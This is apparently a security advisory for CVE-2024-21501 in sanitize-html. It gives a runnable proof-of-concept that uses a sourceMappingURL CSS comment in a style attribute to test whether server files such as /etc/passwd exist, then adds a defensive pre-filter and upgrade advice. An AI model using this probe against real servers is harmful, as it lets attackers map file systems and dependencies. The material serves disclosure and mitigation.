sanitize-html — CVE-2024-21501
Affected versions (<2.12.1) of this package are vulnerable to Information Exposure when used on the backend with the style attribute allowed, enabling enumeration of system files including project dependencies. An attacker could exploit this to gather details about the targeted server's file system structure and dependencies.
Proof of Concept
```javascript
// index.js
const sanitizeHtml = require('sanitize-html');
const file_exist = `<a style='background-image: url("/*# sourceMappingURL=/etc/passwd */");'>@slonser_</a>`;
const file_dont_exist = `<a style='background-image: url("/*# sourceMappingURL=/etc/nopasswd */");'>@slonser_</a>`;
// vulnerable sanitize
const sanitize = (input) => sanitizeHtml(input, {
  allowedAttributes: {
    ...sanitizeHtml.defaults.allowedAttributes,
    a: ['style'],
  },
});
const sanitized_exist = sanitize(file_exist);
const sanitized_dont_exist = sanitize(file_dont_exist);
console.log(sanitized_exist, "<-- response when file is found");
console.log(sanitized_dont_exist, "<-- response when file is not found");
```

Output

```
root@8cf83668943d:~# node index.js
[... snip ...]
<a>@slonser_</a> <-- response when file is found
<a style="background-image:url("/*# sourceMappingURL=/etc/nopasswd */")">@slonser_</a> <-- response when file is not found
```

The vulnerability allows differentiation between existing and non-existing files based on how the sanitizer processes the CSS, creating a timing or output-based side channel for file enumeration.
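The following is an added, defender-side example; it is not part of the advisory and not sanitize-html's own code. It shows a pre-filter a backend can place in front of the sanitizer while the upgrade to a fixed version (2.12.1 or later) is pending: CSS comments are stripped out of every `style` attribute before the string reaches the CSS parser, and any comment carrying a source-map annotation is reported so the request can be logged or rejected. Because the probe is refused whether or not the referenced file exists, the existing/non-existing distinction in the output disappears. The function names (`inspectStyleAttributes`, `configAllowsStyle`, `sanitizeWithPrefilter`), the regular expressions and the `sanitizeFn` callback parameter are all assumptions of this example; `configAllowsStyle` assumes the `allowedAttributes` shape used in the proof of concept (tag name mapped to an array of attribute names).

```javascript
// Added example, not from the advisory or the sanitize-html project.
// Defensive pre-filter for a backend that must keep style attributes enabled:
// strips CSS comments from every style attribute before the HTML reaches the
// sanitizer and reports source-map annotations so they can be logged/rejected.

// Matches a style attribute with either quoting style. Group 1 is the leading
// whitespace, group 2 the quoted value, groups 3/4 the double-/single-quoted body.
const STYLE_ATTR = /(\s)style\s*=\s*("([^"]*)"|'([^']*)')/gi;
// CSS block comments, non-greedy so adjacent comments are handled separately.
const CSS_COMMENT = /\/\*[\s\S]*?\*\//g;
// Annotation forms a CSS parser may interpret as a source-map reference.
const SOURCE_MAP = /[#@]\s*source(Mapping)?URL\s*=/i;

// Returns { html, findings }: html with CSS comments removed from all style
// attributes, and the list of comments that carried a source-map annotation.
function inspectStyleAttributes(html) {
  const findings = [];
  const cleaned = html.replace(STYLE_ATTR, (match, ws, quoted, dq, sq) => {
    const value = dq !== undefined ? dq : sq;
    for (const comment of value.match(CSS_COMMENT) || []) {
      if (SOURCE_MAP.test(comment)) findings.push(comment);
    }
    const stripped = value.replace(CSS_COMMENT, '');
    const quote = quoted[0]; // preserve the original quoting character
    return `${ws}style=${quote}${stripped}${quote}`;
  });
  return { html: cleaned, findings };
}

// Audit helper (assumed shape): does a sanitize-html options object allow the
// style attribute on any tag, including under a '*' wildcard key? Accepts both
// plain attribute-name strings and { name } objects in the arrays.
function configAllowsStyle(options) {
  const allowed = (options && options.allowedAttributes) || {};
  return Object.values(allowed).some((attrs) =>
    Array.isArray(attrs) && attrs.some((a) => {
      const name = typeof a === 'string' ? a : a && a.name;
      return String(name).toLowerCase() === 'style';
    })
  );
}

// Wrap the application's sanitizer (sanitizeFn is a hypothetical callback):
// reject inputs whose style attributes carry a source-map annotation outright,
// otherwise pass the comment-stripped HTML on to the real sanitizer.
function sanitizeWithPrefilter(html, sanitizeFn) {
  const { html: cleaned, findings } = inspectStyleAttributes(html);
  if (findings.length > 0) {
    throw new Error(
      `rejected style attribute with source-map annotation: ${findings.join(', ')}`
    );
  }
  return sanitizeFn(cleaned);
}
```

Usage: call `sanitizeWithPrefilter(userHtml, (h) => sanitizeHtml(h, options))` in place of the bare `sanitizeHtml` call, and run `configAllowsStyle(options)` in a startup check to find deployments where `style` is enabled at all. The regular-expression attribute scan is an approximation of an HTML parser, so it is a layer in front of the upgrade, not a replacement for it; the only complete fix the advisory supports is moving to a version that is not affected (2.12.1 or later), or removing `style` from `allowedAttributes` on the backend.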